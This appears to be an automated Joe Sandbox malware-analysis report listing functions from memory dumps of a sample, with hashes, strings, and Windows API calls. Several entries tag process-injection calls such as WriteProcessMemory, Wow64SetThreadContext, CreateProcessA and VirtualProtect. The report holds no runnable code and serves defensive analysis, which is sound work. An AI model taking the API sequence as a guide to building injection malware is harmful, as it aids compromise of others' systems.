Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 6248f3fdee3fbf848535605e9c74d0533baac3a41b88c218047d85972632d089
Instruction ID: 107c1e5ec7570e65869851be1f262b045d954f6218c26ce5bde00dc7ad157ea3
Opcode Fuzzy Hash: 6248f3fdee3fbf848535605e9c74d0533baac3a41b88c218047d85972632d089
Instruction Fuzzy Hash: 7AB104B4E05219CFDB18CFA9D984B9DBBF2BB4A300F218169D429B7395D730A981CF00

Function 0714392A Relevance: 1.5, Strings: 1, Instructions: 208COMMON

Download Yara Rule

Strings

Tekq, xrefs: 07143738

Memory Dump Source

Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 4ea3cd22c6c5f1d745aac7148ec44dbd055c7dcc6b5f8863973cd1d7d912f618
Instruction ID: c23a79cad6a85349bcd32605a76692a4c67c31f4d379d135b0858ef772a8b494
Opcode Fuzzy Hash: 4ea3cd22c6c5f1d745aac7148ec44dbd055c7dcc6b5f8863973cd1d7d912f618
Instruction Fuzzy Hash: C191F4B4E01219CFDB58CFA9D984B9DBBF2BB4A305F2181A9D419B7395D734A981CF00

Function 070A1200 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2054422216.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70a0000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63f243f2b4a87dbbf2b98905c3025b1676dbb7a0831b928b9c235e99a07e96bc
Instruction ID: ff662e6ba68b94845d5170edb6a26586578d02b0461d6bbb269113664fb4fac3
Opcode Fuzzy Hash: 63f243f2b4a87dbbf2b98905c3025b1676dbb7a0831b928b9c235e99a07e96bc
Instruction Fuzzy Hash: 8422A9B0B01209AFDB19DBB9C550BAEB7F6AF89304F244569E146DB3A0CB75EC01CB51

Function 071767DB Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7933652a69d8b88ae3af7118eebce9afc59b8dc465b0c3bee79e22f913cd9cdd
Instruction ID: d5df1c1f3ee8632f6210e5789751613e9fa35a574c931020a6f087c0b0daac6e
Opcode Fuzzy Hash: 7933652a69d8b88ae3af7118eebce9afc59b8dc465b0c3bee79e22f913cd9cdd
Instruction Fuzzy Hash: 1352D3B4A006298FCB64DF28C994B9AB7F6FB89301F1092D9D44DA7355DB34AE81CF50

Function 074B2F20 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cea94547b0648e4e0062042dec2ef4db14254cd2da8ba837082a3432208f70f6
Instruction ID: 5db4b855e036c0867c3297e939cbae6affe5e2e13605a59593ceeeb5537fa088
Opcode Fuzzy Hash: cea94547b0648e4e0062042dec2ef4db14254cd2da8ba837082a3432208f70f6
Instruction Fuzzy Hash: 03C1D1B4A05218CFDB24DFAAD544BDEBBF2FB89304F50926AD409AB244DB355C46CF50

Function 074B2F30 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c0a5e8a6b8d4fc4c846e815f04765cb78183d3d3cbb0be79ccfaae614e38d0
Instruction ID: 2bb430257ce9e4596da30820261fdf6a62ea8dd5d5cdce5b598af43baa3aca04
Opcode Fuzzy Hash: 43c0a5e8a6b8d4fc4c846e815f04765cb78183d3d3cbb0be79ccfaae614e38d0
Instruction Fuzzy Hash: 3FC1C0B4A05218CFDB64DFAAD584BDDBBF2FB89304F50926AD409AB244DB356C46CF10

Function 0715A3B8 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8846c962f51fe0eb90b9b303a613a6c2844f92869921b1ee28eb7f6c608a0737
Instruction ID: 815ce59712309c53c55d5c2805dc25b2a2f24e762d94a84010da601c9a682acc
Opcode Fuzzy Hash: 8846c962f51fe0eb90b9b303a613a6c2844f92869921b1ee28eb7f6c608a0737
Instruction Fuzzy Hash: 2F9159B4E54218CFDB08DFA9D484BADBBF1FF8A304F509269D419A7294DB34A885CF40

Function 07435D48 Relevance: 4.2, Strings: 3, Instructions: 484
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hoq, xrefs: 0743621D
Hoq, xrefs: 0743629C
Hoq, xrefs: 0743624C

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: Hoq$Hoq$Hoq
API String ID: 0-3310881576
Opcode ID: 66089e82b0045277d4a87eaf1351d6c474e5b3793fc1553dbf01fac9f23151ce
Instruction ID: 11f829d94fc3ad21d823619d2507ea3045a76a7e05f01d4141b5b14878fe5688
Opcode Fuzzy Hash: 66089e82b0045277d4a87eaf1351d6c474e5b3793fc1553dbf01fac9f23151ce
Instruction Fuzzy Hash: 17125EB0A00206DFCB24DFA9C594AAEB7B2FF88300F15852DD44A9B795DB35EC46CB51

Function 07437B78 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'kq, xrefs: 07437E71
4'kq, xrefs: 07437D92
4'kq, xrefs: 07437EF1

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq$4'kq
API String ID: 0-2478202913
Opcode ID: e4226e90155b0880682eedff8fae13e2071872a9a29a528966eded55d13fb678
Instruction ID: d5052ffe0dee03ccb99baeb8fd5d54485be4487ef54952d241fff9423d3ab16e
Opcode Fuzzy Hash: e4226e90155b0880682eedff8fae13e2071872a9a29a528966eded55d13fb678
Instruction Fuzzy Hash: 5FF10A74A10218DFCB05DFA8D998A9DB7B2FF89300F518159E846AB3A5CB75EC42CF50

Function 0743C160 Relevance: 4.1, Strings: 3, Instructions: 363
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 0743C289
(oq, xrefs: 0743C2B5
Hoq, xrefs: 0743C2E1

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: (oq$(oq$Hoq
API String ID: 0-3836682603
Opcode ID: 5af5ed5f11e4695e50446a7e51a2407d9d1a6b4378559787378a19037eabebad
Instruction ID: f9a7a4ff65a59a54a5713fc2514c79ec5e61b3de098202a36d140daf8bba4b44
Opcode Fuzzy Hash: 5af5ed5f11e4695e50446a7e51a2407d9d1a6b4378559787378a19037eabebad
Instruction Fuzzy Hash: 66E15374A00209DFCB14EFA4D59499EBBB2FF89310F118569E805AB3A4DB34ED45CB91

Function 074B506C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 074B5161

Strings

d, xrefs: 074B506D

Memory Dump Source

Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd

Similarity

API ID: CreateFile
String ID: d
API String ID: 823142352-2564639436
Opcode ID: 930c82c725ec16d2063167bdf326de117a46dc266e94e3d0096fe4f7524cfdb3
Instruction ID: 162518e77e3be907d0f0b15f782e2f576a7bb534891f1036632bff7b804ec40d
Opcode Fuzzy Hash: 930c82c725ec16d2063167bdf326de117a46dc266e94e3d0096fe4f7524cfdb3
Instruction Fuzzy Hash: 624155B1D002599FDB20CFA9C881BDEFBB1FF48310F14842AE815AB254DB759891CFA1

Function 070F1EA8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

4'kq, xrefs: 070F2659
4'kq, xrefs: 070F2669

Memory Dump Source

Source File: 00000000.00000002.2054592830.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70f0000_Ref#2056119.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq
API String ID: 0-4171853269
Opcode ID: c61838c0e62390468ed74a81652e1a48670edcafc5f0f86bd384e9cd57bd7e2c
Instruction ID: 87cce832bbfae59f238ec55b55ab8e0df05e3e4f65f6d004cec5cb6c1d828004
Opcode Fuzzy Hash: c61838c0e62390468ed74a81652e1a48670edcafc5f0f86bd384e9cd57bd7e2c
Instruction Fuzzy Hash: 4542E8B8E0020ECFDB55DBA8D598AADBBB1FF49301F508215D612AB794C7399C86CF50

Function 070F29D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'kq, xrefs: 070F2E66
4'kq, xrefs: 070F2E76

Memory Dump Source

Source File: 00000000.00000002.2054592830.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70f0000_Ref#2056119.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq
API String ID: 0-4171853269
Opcode ID: 9dac4ca4d68e58c31665e597e43ea5af1d502eff550cab01d364aa104e5ba50d
Instruction ID: 6de9b874709344da928ac285927dd914a70c0c5039540cfb9270b1f0b177d631
Opcode Fuzzy Hash: 9dac4ca4d68e58c31665e597e43ea5af1d502eff550cab01d364aa104e5ba50d
Instruction Fuzzy Hash: CDF1F6B8D01209DFCB69DFA4D5996ECBBB2FF49315F604229E916A7390CB345886CF40

Function 07435800 Relevance: 2.9, Strings: 2, Instructions: 352
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 07435814
d, xrefs: 07435A61

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: (oq$d
API String ID: 0-886291620
Opcode ID: 34b3942e9cb1ba3cc248ce4f8e5c9af264c3b5cff664bf429cea5379c59d53d6
Instruction ID: 116d00c6931abbe310d2dd7e752a910eaa4cf5d69f7cba32e9cd986c2edfffb0
Opcode Fuzzy Hash: 34b3942e9cb1ba3cc248ce4f8e5c9af264c3b5cff664bf429cea5379c59d53d6
Instruction Fuzzy Hash: C7D16C74700606CFCB14DF28C5809AAFBF6FF89310B69896AD45A9B365DB30F855CB90

Function 070F3968 Relevance: 2.7, Strings: 2, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'kq, xrefs: 070F3BE9
4'kq, xrefs: 070F3BF9

Memory Dump Source

Source File: 00000000.00000002.2054592830.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70f0000_Ref#2056119.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq
API String ID: 0-4171853269
Opcode ID: 5dbbcd84d6cd55bd28f213dec4c8953d62d57c024f4bec0ae5c36b4a760e0a44
Instruction ID: 5a5930b6ea728e16cdaa0b5197c47d18fb495eb04754fc561f21a88f5c776c27
Opcode Fuzzy Hash: 5dbbcd84d6cd55bd28f213dec4c8953d62d57c024f4bec0ae5c36b4a760e0a44
Instruction Fuzzy Hash: 3A91EFB4E15209CFDB19DFA9D494AECBBB2FF89311F10952AD921B7290CB355882CF50

Function 07431888 Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

Hoq, xrefs: 07431A2D
(oq, xrefs: 0743199E

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: (oq$Hoq
API String ID: 0-3084834809
Opcode ID: df33902c849559c1d1292b95545fe9d7615e10afe2777ed4d2f4857dc2b95c93
Instruction ID: c451d6d3571e54dc3ae1f649e890e99f00516ccd4378a69ad2a7d9623713e0dc
Opcode Fuzzy Hash: df33902c849559c1d1292b95545fe9d7615e10afe2777ed4d2f4857dc2b95c93
Instruction Fuzzy Hash: 1F51BBB07006598FC719AF39C5646AE7BB6AF8A200B24456ED4468F3E1CF35DD42CB91

Function 07433E40 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

(oq, xrefs: 07433FAB
(oq, xrefs: 07433F54

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: (oq$(oq
API String ID: 0-3207256227
Opcode ID: 7d326e89122ae984176d923a70f7f821ed6c8bebb945c33e86f6af93f35626c2
Instruction ID: c259416df0f78c155c292bf55416e840d8b33904750c6f75667355003d35e44e
Opcode Fuzzy Hash: 7d326e89122ae984176d923a70f7f821ed6c8bebb945c33e86f6af93f35626c2
Instruction Fuzzy Hash: 9251BE713002468FDB159F29D8546AE7BA2FF88350F64816AE805CF391CF39DC86CB91

Function 07438A58 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,oq, xrefs: 07438DD3

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: ,oq
API String ID: 0-651702701
Opcode ID: 24614a06d97af9b95bc1ef6de9d7a05f77b81c9ae6930b3dfe0b7b3c153da08f
Instruction ID: c75f445e15ba29829484c2a102614720f3c8eb42cdd8de26e784bd9e4f01adcb
Opcode Fuzzy Hash: 24614a06d97af9b95bc1ef6de9d7a05f77b81c9ae6930b3dfe0b7b3c153da08f
Instruction Fuzzy Hash: 33522EB5A002288FDB64CF69C951BDDBBF6BF88300F1541E9E549AB391DA309D81CF61

Function 07432E30 Relevance: 1.8, Strings: 1, Instructions: 542COMMON

Download Yara Rule

Strings

(_kq, xrefs: 074330CD

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: (_kq
API String ID: 0-2183774854
Opcode ID: 0345aad647017b6dc127e6590ea2913353a4d97a823d28d4a463948ba2249988
Instruction ID: 0d4d0e0fd6105cba3f9a15549f5c2e4f7a7764f1229f059a94dbfef9281b3783
Opcode Fuzzy Hash: 0345aad647017b6dc127e6590ea2913353a4d97a823d28d4a463948ba2249988
Instruction Fuzzy Hash: 98229FB5A002159FDB14DFA9D891AAEB7B2BF88300F14816AE905DF3A1CB75EC41CB50

Function 074BEF1D Relevance: 1.7, APIs: 1, Instructions: 205processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074BF102

Memory Dump Source

Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 554c1f2dedc4856bb20395f5c848d055fb5d60d7079d30367ae9df50033012d0
Instruction ID: ce2d8bffa4eae66cc560adbe000c5a1a758fdbaccfda57519b3e9eb7f8a3ff30
Opcode Fuzzy Hash: 554c1f2dedc4856bb20395f5c848d055fb5d60d7079d30367ae9df50033012d0
Instruction Fuzzy Hash: 7C8138B1D0025ADFDB20CFA9C9817DEBBF1BF48314F14852AE858A7354D7749885CBA1

Function 074BEF28 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074BF102

Memory Dump Source

Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 14a3bd19cdb88887a5d2aea971d6e58dc0e6c363c5317c6b6690d71950c01ecd
Instruction ID: 80c0ced20603025f765b9f8cad6518eb19361c6ab6c8d016f4c5812363b467a4
Opcode Fuzzy Hash: 14a3bd19cdb88887a5d2aea971d6e58dc0e6c363c5317c6b6690d71950c01ecd
Instruction Fuzzy Hash: 3F8127B1D0025ADFDB20CFA9C9817DEBBF1BF88314F14852AE858A7354D7749885CBA1

Function 0133A328 Relevance: 1.7, APIs: 1, Instructions: 200COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0133A57E

Memory Dump Source

Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6dba4ff56a50e829fb667f02b102c7b8435401952b466d58bc2c6019b31654f5
Instruction ID: 73c9b409184f3b5333af3edf9f0f15cfe1244870459050d858d8369a84bdd2fe
Opcode Fuzzy Hash: 6dba4ff56a50e829fb667f02b102c7b8435401952b466d58bc2c6019b31654f5
Instruction Fuzzy Hash: E78134B0A00B058FEB25DF29D44579ABBF1BF88318F008A2DD48AD7B50D775E845CB94

Function 074B42CD Relevance: 1.6, APIs: 1, Instructions: 150fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 074B441D

Memory Dump Source

Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 6c3e4db9624321e1b45e1ac115d36d1c1ece771108bdf267f395394e62989c97
Instruction ID: 4986e75dd64f912a2367c7e83e3db571925ab09ea901aaee52bea5aaa635de58
Opcode Fuzzy Hash: 6c3e4db9624321e1b45e1ac115d36d1c1ece771108bdf267f395394e62989c97
Instruction Fuzzy Hash: C0518CB0D006699FDB20CFA9C9457DEBBF1FF48310F18812AD854E7345D77498858B91

Function 074B42D8 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 074B441D

Memory Dump Source

Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 2203c762183e90c338d7ed93ece6f24dbd50eec9b620a59cb8e897eedbb0b48f
Instruction ID: 98f1dd71c0dd737025e1b33e1dd99753d76e512e56b448c38b264e7a65160944
Opcode Fuzzy Hash: 2203c762183e90c338d7ed93ece6f24dbd50eec9b620a59cb8e897eedbb0b48f
Instruction Fuzzy Hash: E3517CB1D002699FDB20CFADC9857DEBBF1BF48310F18812AD855E7385D77498858B91

Function 074B5078 Relevance: 1.6, APIs: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 074B5161

Memory Dump Source

Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7c1533ac886caef14e059225738fbe2550fad12955b8677eb6229ca610a54b2a
Instruction ID: cf28fd04dd6f6b724adc045c700027f7b7161c001b8c3a2214433d0d851601f4
Opcode Fuzzy Hash: 7c1533ac886caef14e059225738fbe2550fad12955b8677eb6229ca610a54b2a
Instruction Fuzzy Hash: 794134B1D002599FDB20DFA9C985BDEFBB1EF88310F14842AE815A6250DB759891CF91

Function 074B5500 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 074B5594

Memory Dump Source

Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 65c0ac379295a33d3d198db88a08d2ee63d8f81379ac1d81425366df5bdc300e
Instruction ID: b326a95ce0e3c23f350c11c502ef96e8dc508aab7002dc7f1ab7ac1b412877f7
Opcode Fuzzy Hash: 65c0ac379295a33d3d198db88a08d2ee63d8f81379ac1d81425366df5bdc300e
Instruction Fuzzy Hash: F8215AB18002599FDB10CFAAC941BEEFBF5FF48310F10842AE554A7250C7399955DFA4

Function 075BFE68 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 075BFEF8

Memory Dump Source

Source File: 00000000.00000002.2058988226.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75a0000_Ref#2056119.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: bba2db0e22223a4ff4fe72252379612ffe39c1b90b42762cbe50ea835e530911
Instruction ID: e3b9236e50d605e72c1df44f17feffe5471ce0e0c4b07672814094884eb6b30c
Opcode Fuzzy Hash: bba2db0e22223a4ff4fe72252379612ffe39c1b90b42762cbe50ea835e530911
Instruction Fuzzy Hash: 372127B1900359DFDB10CFA9C985BEEBBF5FF48310F10842AE959A7251C7789944CBA4

Function 074BF630 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074BF6B6

Memory Dump Source

Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 055767c4aa6b02702ac8dd37f84cac7cd15bee7a9fa5617be8c8e6c58c51fb4d
Instruction ID: 53a28972c455429967b8b000245b4a9f93bc713761d399323ffb1bb63289c9cf
Opcode Fuzzy Hash: 055767c4aa6b02702ac8dd37f84cac7cd15bee7a9fa5617be8c8e6c58c51fb4d
Instruction Fuzzy Hash: 4C2136B19002099FDB20DFAAC885BEEBBF4EB48224F14842AD459A7251D7789945CFA4

Function 074B5508 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 074B5594

Memory Dump Source

Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: eb20c92604ad325a31c64f20ca47a43d5666785bc52bf9c5ffba79e8362efdb1
Instruction ID: 0ab8c92e4f8a778d9cb25d43092a4ac44d6a37c2dbf92dfa540d591a02e35b03
Opcode Fuzzy Hash: eb20c92604ad325a31c64f20ca47a43d5666785bc52bf9c5ffba79e8362efdb1
Instruction Fuzzy Hash: 872148B18002599FDB10DFAAC841BEEFBF5FF48320F14842AE958A7250C7389954DFA4

Function 0133C7D4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0133CBD6,?,?,?,?,?), ref: 0133CC97

Memory Dump Source

Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9477f4b86362272fa0605d335a0d65d58344267eb4f780e76b52700d223b15b4
Instruction ID: 72a6753a75a8481c2740036008feee98f1209c309b31d8477974c662c2731f6a
Opcode Fuzzy Hash: 9477f4b86362272fa0605d335a0d65d58344267eb4f780e76b52700d223b15b4
Instruction Fuzzy Hash: 3D21E5B59002089FDB10CF9AD584ADEFBF4EB48314F14845AE914B7310D375A954CFA4

Function 0133CC08 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0133CBD6,?,?,?,?,?), ref: 0133CC97

Memory Dump Source

Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 122af2a761b90d796f2c634a23ad8a7be731aea61adfbaf5bdd91f0bc9c443d6
Instruction ID: 8c869725c35ced75785db9eabc4e9419795147f3db4f50ca849cd92ea12364ba
Opcode Fuzzy Hash: 122af2a761b90d796f2c634a23ad8a7be731aea61adfbaf5bdd91f0bc9c443d6
Instruction Fuzzy Hash: 1621E3B5900258DFDB10CFA9D584ADEFBF4EB48314F14845AE958B3210C378A945CFA4

Function 074BF638 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074BF6B6

Memory Dump Source

Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c440a5dc30890661f2551f5dc30c9bced39453b234b7a222a4dc07895f0bddab
Instruction ID: bc4985856c958a512878bb7db759cc54bb951efdddb65a27d0b43b56ae8bdeca
Opcode Fuzzy Hash: c440a5dc30890661f2551f5dc30c9bced39453b234b7a222a4dc07895f0bddab
Instruction Fuzzy Hash: 49213AB19003098FDB10DFAAC4457EEBBF4EF48324F14842AD459A7251D7789945CFA4

Function 071594B8 Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07159534

Memory Dump Source

Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b68ae32e1ee5c9797d0474bb537eddd7fdd437c130ac057b18c9b8e00297d5ea
Instruction ID: 0f14f15b88d25100c170b80e36218d76c9b6cd78298dfb6bb20dcbf36ba34e2c
